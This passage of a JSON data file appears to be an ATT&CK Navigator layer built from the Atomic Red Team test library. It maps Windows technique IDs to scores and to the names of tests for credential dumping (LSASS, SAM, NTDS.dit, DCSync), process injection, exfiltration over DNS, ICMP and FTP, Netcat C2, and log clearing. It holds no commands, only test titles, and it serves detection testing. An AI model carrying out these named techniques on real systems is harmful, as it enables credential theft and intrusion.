Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download 